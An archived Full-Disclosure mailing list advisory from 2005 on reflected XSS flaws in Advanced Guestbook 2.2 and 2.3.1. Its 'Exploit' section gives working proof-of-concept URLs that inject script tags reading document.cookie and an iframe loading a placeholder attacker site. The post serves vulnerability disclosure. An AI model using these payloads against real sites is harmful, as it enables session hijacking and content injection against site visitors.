[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Advanced Guestbook remote XSS exploit

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Advanced Guestbook remote XSS exploit
From: handrix@xxxxxxxx
Date: Sun, 25 Dec 2005 22:52:02 +0100

Advanced Guestbook 2.2 and 2.3.1 and possibly other versions
remote XSS vulnerabilities
By: Handrix <handrix_at_morx_org>
16 December 2005
MorX security research team
www.morx.org 

Description:

Advanced Guestbook is a PHP-based guestbook script.

index.php and comment.php scripts are vulnerable to XSS attacks. This issue 
can allow an attacker
to bypass content filters and potentially carry out cross-site scripting, HTML 
injection and other
attacks.

Exploit:

http://www.example.com/guestbook/index.php?entry=<script>alert(document.cookie);</script>
http://www.example.com/guestbook/index.php?entry=<iframe 
src=http://www.attackersite.com/>

http://www.example.com/guestbook/comment.php?gb_id=1<script>alert(document.cookie);</script>
http://www.example.com/guestbook/comment.php?gb_id=1<IFRAME 
SRC="javascript:alert('XSS');"></IFRAME>


Vulnerable versions :

Advanced Guestbook 2.2
Advanced Guestbook 2.3.1 

        

        
                
___________________________________________________________________________ 
Nouveau : téléphonez moins cher avec Yahoo! Messenger ! Découvez les tarifs 
exceptionnels pour appeler la France et l'international.
Téléchargez sur http://fr.messenger.yahoo.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] Breaking LoJack for Laptops
Next by Date: Re: [Full-disclosure] Breaking LoJack for Laptops
Previous by thread: [Full-disclosure] Yahoo mail Cross Site Scripting vulnerability
Next by thread: [Full-disclosure] Spy Agency Mined Vast Data Trove
Index(es):
- Date
- Thread